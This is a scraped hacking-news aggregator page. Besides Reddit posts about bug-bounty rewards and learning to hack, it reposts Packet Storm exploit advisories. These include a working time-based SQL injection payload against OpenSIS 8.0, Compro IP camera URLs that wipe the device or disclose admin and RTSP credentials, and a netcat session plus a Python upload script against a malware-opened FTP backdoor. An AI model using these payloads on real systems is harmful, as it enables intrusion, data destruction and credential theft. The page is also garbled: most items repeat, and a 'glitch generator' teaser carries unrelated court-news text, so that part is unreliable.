hacking: security in practice
Ethical hacker found a bug on my site... reward?
I run a website. Someone just contacted us to let us know that he found a vulnerability on our website (UI redressing) and provided some details about the bug. He is now asking us for a reward.
Our team investigating the bug now. We are open to the idea of providing him with a reward but this is all completely new to us. What are the norms in these situations and what's a fair reward?
submitted by /u/Dangerous-Durian8843
[link] [comments]
Ethical hacker found a bug on my site... reward?
I run a website. Someone just contacted us to let us know that he found a vulnerability on our website (UI redressing) and provided some details about the bug. He is now asking us for a reward.
Our team investigating the bug now. We are open to the idea of providing him with a reward but this is all completely new to us. What are the norms in these situations and what's a fair reward?
submitted by /u/Dangerous-Durian8843
[link] [comments]
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community
hacking: security in practice
Is raspberry pi better than a normal laptop for ethical hacking?
Well I am kinda broke at the moment and I wanna learn hacking. Can I learn and practice everything on a raspberry pi instead of buying a new laptop?
submitted by /u/pra7av
[link] [comments]
Is raspberry pi better than a normal laptop for ethical hacking?
Well I am kinda broke at the moment and I wanna learn hacking. Can I learn and practice everything on a raspberry pi instead of buying a new laptop?
submitted by /u/pra7av
[link] [comments]
reddit
Is raspberry pi better than a normal laptop for ethical hacking?
Well I am kinda broke at the moment and I wanna learn hacking. Can I learn and practice everything on a raspberry pi instead of buying a new laptop?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Know? How To Use Of Mobile Legends Glitch Generator
The Supreme Court officially denied a solicitation from Texas early termination suppliers to freeze a state law that bars fetus removals…
Continue reading on Medium »
Know? How To Use Of Mobile Legends Glitch Generator
The Supreme Court officially denied a solicitation from Texas early termination suppliers to freeze a state law that bars fetus removals…
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
A Conceptual Introduction to Automating Bug Bounties ft. ARPSyndicate, YesWeHack & ScanFactory
https://cdn-images-1.medium.com/max/844/1*9XUM2zHHerS9bEtld4LnyA.png
Exploring the big picture of Bug Bounty Automation with ARPSyndicate featuring Lazada BBP on YesWeHack.
Continue reading on Medium »
A Conceptual Introduction to Automating Bug Bounties ft. ARPSyndicate, YesWeHack & ScanFactory
https://cdn-images-1.medium.com/max/844/1*9XUM2zHHerS9bEtld4LnyA.png
Exploring the big picture of Bug Bounty Automation with ARPSyndicate featuring Lazada BBP on YesWeHack.
Continue reading on Medium »
A Conceptual Introduction to Automating Bug Bounties ft. ARPSyndicate, YesWeHack & ScanFactory
https://g147.medium.com/a-conceptual-introduction-to-automating-bug-bounties-ft-arpsyndicate-yeswehack-scanfactory-f2468f345d7?source=rss------bug_bounty-5
https://g147.medium.com/a-conceptual-introduction-to-automating-bug-bounties-ft-arpsyndicate-yeswehack-scanfactory-f2468f345d7?source=rss------bug_bounty-5
Exploring the big picture of Bug Bounty Automation with ARPSyndicate featuring Lazada BBP on YesWeHack.Continue reading on Medium » (https://g147.medium.com/a-conceptual-introduction-to-automating-bug-bounties-ft-arpsyndicate-yeswehack-scanfactory-f2468f345d7?source=rss------bug_bounty-5)
A Conceptual Introduction to Automating Bug Bounties ft. ARPSyndicate, YesWeHack & ScanFactory
Exploring the big picture of Bug Bounty Automation with ARPSyndicate featuring Lazada BBP on YesWeHack.Continue reading on Medium »
Read more...
Exploring the big picture of Bug Bounty Automation with ARPSyndicate featuring Lazada BBP on YesWeHack.Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
OpenSIS Community 8.0 SQL Injection
https://3.bp.blogspot.com/-_lYy5AwzHPI/WWlvAVk_lrI/AAAAAAAAIKU/HsTDdKCabVkkHkFsXQw08U72hOmjap5rACLcBGAs/s1600/h121.png
OpenSIS Community version 8.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
OpenSIS Community 8.0 SQL Injection
https://3.bp.blogspot.com/-_lYy5AwzHPI/WWlvAVk_lrI/AAAAAAAAIKU/HsTDdKCabVkkHkFsXQw08U72hOmjap5rACLcBGAs/s1600/h121.png
OpenSIS Community version 8.0 suffers from a remote SQL injection vulnerability.
MD5 |
f6ec06f5199d921c579c4ca3d1ba53d8Download
# Exploit Title: OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection
# Date: 09/01/2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
A SQL injection vulnerability exists in the Take Attendance functionality of OS4Ed's OpenSIS 8.0. allows an attacker to inject their own SQL query. The cp_id_miss_attn parameter from TakeAttendance.php is vulnerable to SQL injection. An attacker can make an authenticated HTTP request as a user with access to "Take Attendance" functionality to trigger this vulnerability.
Steps to reproduce:
1. Login as "Teacher" and navigate to "Attendance" then "Take Attendance". Capture the request on a web proxy such as BurpSuite
Or just navigate to the URL:
http://localhost/Ajax.php?modn...
Vulnerable parameter: cp_id_miss_attn
SQLi payload: r AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)
URL with the payload: http://localhost/Ajax.php?modn... AND (SELECT 1670 FROM (SELECT(SLEEP(10)))VSpq)
&cpv_id_miss_attn=23&ajax=true
2. The page should load depends on the sleep
You can use manual queries to dump database information or use sqlmap.
PoC: https://youtu.be/GGHiPvdPRas
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Compro Technology IP Camera Denial Of Service
https://4.bp.blogspot.com/-sHG2jViTb-c/WWlvSCf2XfI/AAAAAAAAINY/YxfxwjOK_o05QB9TpuqqysTdHaIb3yf8wCLcBGAs/s1600/h36.png
Compro Technology IP Camera suffers from a denial of service vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Compro Technology IP Camera Denial Of Service
https://4.bp.blogspot.com/-sHG2jViTb-c/WWlvSCf2XfI/AAAAAAAAINY/YxfxwjOK_o05QB9TpuqqysTdHaIb3yf8wCLcBGAs/s1600/h36.png
Compro Technology IP Camera suffers from a denial of service vulnerability.
MD5 |
efd58d88673ff1544e914240b154d4a6Download
# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS)
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40378
There is a backdoor prefabricated in the device in this path. Accessing the
file through the browser after logging in will cause the device to delete
all data (including the data of the camera itself).
Payload:Visit this page after logging in
/cgi-bin/support/killps.cgi
please refer to:
https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Compro Technology IP Camera Credential Disclosure
https://1.bp.blogspot.com/-ioJ53oCx49I/WWlvK_l1r2I/AAAAAAAAIMA/qrzTnRYsG8QUcC_eXdokNXQ8WpqzEpJrACLcBGAs/s1600/h16.png
Compro Technology IP Camera suffers from multiple credential disclosure vulnerabilities.
MD5 |
Download
Source:packetstormsecurity.com
Compro Technology IP Camera Credential Disclosure
https://1.bp.blogspot.com/-ioJ53oCx49I/WWlvK_l1r2I/AAAAAAAAIMA/qrzTnRYsG8QUcC_eXdokNXQ8WpqzEpJrACLcBGAs/s1600/h16.png
Compro Technology IP Camera suffers from multiple credential disclosure vulnerabilities.
MD5 |
057e3f25cc663f43a17d9a78de458afcDownload
# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40380
There are unauthorized access vulnerabilities, which can lead to the
disclosure of device administrator usernames and passwords or rstp
usernames and passwords.
Payload:
/cgi-bin/cameralist/cameralist.cgi
/cgi-bin/cameralist/setcamera.cgi?id=*
please refer to:
https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.MoonPie.40 Authentication Bypass / Code Execution
https://1.bp.blogspot.com/-93ZP4TpCwBw/WWlu7wGG0SI/AAAAAAAAIJg/yDCONAkAMz8MX1TtbGL6KFo1njFu_UyvACLcBGAs/s1600/h111.png
Backdoor.Win32.MoonPie.40 malware suffers from bypass and code execution vulnerabilities.
MD5 |
Download
Source:packetstormsecurity.com
Backdoor.Win32.MoonPie.40 Authentication Bypass / Code Execution
https://1.bp.blogspot.com/-93ZP4TpCwBw/WWlu7wGG0SI/AAAAAAAAIJg/yDCONAkAMz8MX1TtbGL6KFo1njFu_UyvACLcBGAs/s1600/h111.png
Backdoor.Win32.MoonPie.40 malware suffers from bypass and code execution vulnerabilities.
MD5 |
7286027878b606377863d3d65933a272Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/9dbb6d56bc9a7813305883acd0f9a355.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.MoonPie.40
Vulnerability: Authentication Bypass RCE
Description: The malware runs an FTP server on TCP port 25686. Third-party attackers who can reach infected systems can logon using any username/password combination. Intruders may then upload executables using ftp PASV, STOR commands, this can result in remote code execution.
Type: PE32
MD5: 9dbb6d56bc9a7813305883acd0f9a355
Vuln ID: MVID-2021-0332
Disclosure: 09/01/2021
Exploit/PoC:
nc64.exe 192.168.18.129 25686
220 MoonPie BETA 4.0
USER mal
331 Password required for mal.
PASS vuln
230 User mal logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
CDUP
250 CWD command successful. "C:/" is current directory.
PASV
227 Entering Passive Mode (192,168,18,129,194,33).
STOR DOOM.js
150 Opening data connection for DOOM.js.
226 File received ok
from socket import *
MALWARE_HOST="192.168.18.129"
PORT=49697
DOOM="DOOM.js"
def doit():
s=socket(AF_INET, SOCK_STREAM)
s.connect((MALWARE_HOST, PORT))
f = open(DOOM, "rb")
EXE = f.read()
s.send(EXE)
while EXE:
s.send(EXE)
EXE=f.read()
s.close()
print("By Malvuln");
if __name__=="__main__":
doit()
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com